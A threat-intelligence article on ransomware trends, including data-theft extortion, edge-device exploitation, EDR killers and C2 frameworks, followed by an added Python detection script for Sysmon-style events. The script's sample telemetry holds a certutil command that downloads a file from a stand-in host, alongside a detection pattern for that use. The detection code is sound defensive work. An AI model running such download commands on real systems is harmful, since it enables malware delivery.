As cybersecurity threats continue to grow in scale, sophistication and intent, it’s vital for organizations to understand the top actors, emerging risks and evolving techniques shaping the landscape to help strengthen cyber defenses.
A recent report by Bridewell highlights just how dynamic the adversarial environment has become over the past year.
Gavin Knapp
Cyber Threat Intelligence Principal Lead at Bridewell.
Threat actors have shifted behaviors, refined their tooling and adapted their tactics.
Here are some key takeaways organizations need to know to contend with imminent threats.
The Rise of Data Theft and Extortion
Historically, ransomware tactics were primarily centered around encrypting victim data and demanding payment for decryption keys. However, recent attacks highlight a shift in tactics, with threat actors now prioritizing data theft and extortion by threatening to publish stolen information unless ransoms are paid.
This was witnessed in an attack on UK telecom provider Colt Technology Services, where the Warlock ransomware group exploited a vulnerability in Microsoft SharePoint to infiltrate the company’s systems.
The attackers stole several hundred gigabytes of sensitive data, including employee salary information, financial records, customer contracts and network architecture details. As a result of not paying the ransom, the group subsequently posted a file list on a Russian Tor forum, offering over a million documents for sale.
Similarly, the Clop ransomware group demonstrated this shift in May 2023 by exploiting a zero-day vulnerability in the MOVEit file-transfer software (CVE-2023-34362) to exfiltrate large volumes of data from hundreds of organizations, including high-profile companies such as the BBC and Boots. Rather than just encrypting systems, Clop threatened to publish the stolen information via its leak site.
This evolution exploits the growing regulatory and reputational pressures organizations face, particularly in jurisdictions with strict privacy laws. While encryption-based attacks often result in larger individual ransom demands due to the urgency of restoring critical services, improvements in data recovery and backup controls have inadvertently made data theft and extortion a more effective alternative for attackers.
The recent major data theft operations performed by hacker groups such as Scattered Spider and Shiny Hunters, who are linked to a collective known as “the Com” or “the Community”, have targeted large software service providers such as Salesforce and other companies that integrate with its platform. This has again highlighted the appetite for data theft and extortion over deploying ransomware to encrypt victims’ files.
Exploitation of Vulnerabilities and Edge Devices
Unpatched vulnerabilities in internet-facing systems and edge devices remain a primary attack vector for ransomware groups. Attackers are exploiting flaws in widely deployed technologies, including VPNs, remote monitoring tools and network appliances, to gain initial access to company systems. These vulnerabilities allow mass compromise at scale and are a major contributor to successful ransomware campaigns.
In 2024, the infamous ransomware groups Clop and Termite emerged as highly proficient at carrying out attacks against managed file transfer services. Additionally, earlier this year, Clop targeted Cleo, the enterprise integration and managed file transfer software provider, by exploiting a zero-day vulnerability (CVE-2024-50623) in its integration software.
This attack affected over 80 organizations, primarily in the telecommunications and healthcare sectors, resulting in significant data exposure and operational disruption. More recently, we have seen several threat actors conducting widespread attacks targeting unpatched Fortinet, Cisco and Ivanti devices. This includes access brokers and affiliates associated with the Qilin, Akira and RansomHub ransomware groups.
Ransomware actors continue to target hypervisors such as VMware ESXi environments, with the intention of disrupting critical IT infrastructure quickly. Groups such as VanHelsing and DragonForce have been linked to recent attacks, actively employing this tactic in ongoing campaigns.
Meanwhile, adversaries are shifting their efforts towards developing capabilities to evade Endpoint Detection and Response (EDR) systems, known as ‘EDR killers’, which is often achieved by abusing vulnerable drivers or native software features.
The success of these attacks has been amplified by the increased use of Living-Off-the-Land Binaries (LOLBINs) and Remote Monitoring and Management (RMM) tools. This is another method of evading EDR: threat actors blend in with normal system or environment operations and remain unnoticed, making detection and mitigation significantly more difficult for organizations.
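The following Python is an added illustration, not code from the Bridewell report or its author: it runs simple detection logic over constructed Sysmon-style events for the two patterns described above, RMM tools that blend into normal operations and driver loads associated with EDR-killer tooling. The sanctioned-RMM policy and the blocked-driver hash list are assumptions for the example (the hash values are placeholders, not real indicators).

```python
import json
import re

# Constructed Sysmon-style sample telemetry (not real data). EventID 1 = process
# creation, EventID 6 = driver load; field names follow Sysmon's conventions.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Program Files\\ScreenConnect\\ScreenConnect.ClientService.exe", "CommandLine": "", "User": "CORP\\svc-it"}
{"EventID": 1, "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\AnyDesk.exe", "CommandLine": "AnyDesk.exe --silent", "User": "CORP\\jdoe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -urlcache -split -f http://example.invalid/a.bin a.bin", "User": "CORP\\jdoe"}
{"EventID": 6, "ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys", "SignatureStatus": "Valid", "Hashes": "SHA256=1111111111111111111111111111111111111111111111111111111111111111"}
{"EventID": 6, "ImageLoaded": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\drv.sys", "SignatureStatus": "Valid", "Hashes": "SHA256=2222222222222222222222222222222222222222222222222222222222222222"}
"""

# Hypothetical organisation policy: real RMM product names, but which ones count as
# "approved" is an assumption for this example.
RMM_TOOLS = {"anydesk", "teamviewer", "screenconnect", "atera", "splashtop"}
APPROVED_RMM = {"screenconnect"}
# Placeholder block list of vulnerable-driver hashes (constructed, not real IoCs);
# in production this would come from a curated vulnerable-driver feed.
BLOCKED_DRIVER_HASHES = {"2222222222222222222222222222222222222222222222222222222222222222"}
USER_WRITABLE = re.compile(r"\\(Users|Temp|ProgramData)\\", re.I)
LOLBIN_PATTERNS = [(re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I), "certutil used as a downloader")]
SHA256_FIELD = re.compile(r"SHA256=([0-9a-fA-F]{64})")

def classify(event):
    """Return the list of alert strings for one parsed event (empty means nothing notable)."""
    alerts = []
    if event.get("EventID") == 1:
        image = event.get("Image", "")
        name = image.rsplit("\\", 1)[-1].lower()
        tool = next((t for t in RMM_TOOLS if t in name), None)
        if tool and tool not in APPROVED_RMM:
            alerts.append(f"unapproved RMM tool: {tool}")
        if tool and USER_WRITABLE.search(image):
            alerts.append(f"RMM tool launched from user-writable path: {image}")
        for pattern, label in LOLBIN_PATTERNS:
            if pattern.search(event.get("CommandLine", "")):
                alerts.append(f"LOLBIN pattern: {label}")
    elif event.get("EventID") == 6:
        path = event.get("ImageLoaded", "")
        match = SHA256_FIELD.search(event.get("Hashes", ""))
        sha256 = match.group(1).lower() if match else ""
        # A validly signed driver is not automatically safe: EDR-killer tooling abuses
        # signed-but-vulnerable drivers, so the hash and the load path are checked too.
        if event.get("SignatureStatus", "").lower() != "valid":
            alerts.append(f"driver without a valid signature: {path}")
        if sha256 in BLOCKED_DRIVER_HASHES:
            alerts.append(f"known vulnerable driver loaded: {path}")
        if USER_WRITABLE.search(path):
            alerts.append(f"driver loaded from user-writable path: {path}")
    return alerts

def scan(jsonl_text):
    """Parse JSON-lines telemetry and return (EventID, alert) pairs for every finding."""
    findings = []
    for line in jsonl_text.strip().splitlines():
        event = json.loads(line)
        findings.extend((event["EventID"], alert) for alert in classify(event))
    return findings
```

Running `scan(SAMPLE_EVENTS)` flags the AnyDesk launch twice (unapproved product, user-writable path), the certutil download pattern once and the temp-directory driver twice (blocked hash, user-writable path), while the sanctioned ScreenConnect service and the system TCP/IP driver produce nothing.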
Offensive security tools remain central to ransomware operations. Despite combined efforts by Microsoft’s Digital Crimes Unit (DCU), Fortra, and the Health Information Sharing and Analysis Center (Health-ISAC) in recent years to combat the use of unauthorized, legacy copies of Cobalt Strike, it remains the most widely used offensive security tool among ransomware operators.
While Fortra has reported an 80% reduction in unauthorized copies observed in the wild over the past two years, in reality the situation remains a cat-and-mouse game: as malicious C2 infrastructure is removed from more reputable hosting providers, operators simply relocate it to less reputable ones.
Even so, this shift still presents some tactical advantages for defenders, as infrastructure hosted on lower-tier providers is more likely to be blocked by security products such as next-generation firewalls and web proxies.
Meanwhile, other offensive tools such as Metasploit, Sliver and Brute Ratel, and more recently newer frameworks such as Pyramid C2, a Python-based command and control (C2) framework, and Adaptix C2, are steadily gaining popularity.
Final thoughts
As we move into 2026, it’s clear that cybercriminals are becoming more agile, more opportunistic and more determined to exploit both technical weaknesses and organizational blind spots. With data‑theft‑first extortion models on the rise, increased targeting of edge devices, and the continued refinement of EDR‑evading tools, defenders face a rapidly evolving challenge that demands equal adaptability.
Organizations must prioritize proactive patching, strengthen monitoring across hybrid environments and invest in threat intelligence that keeps pace with adversaries’ shifting tactics. Those that build resilience now, through preparedness, visibility and robust incident response, will be best positioned to withstand the threats that lie ahead.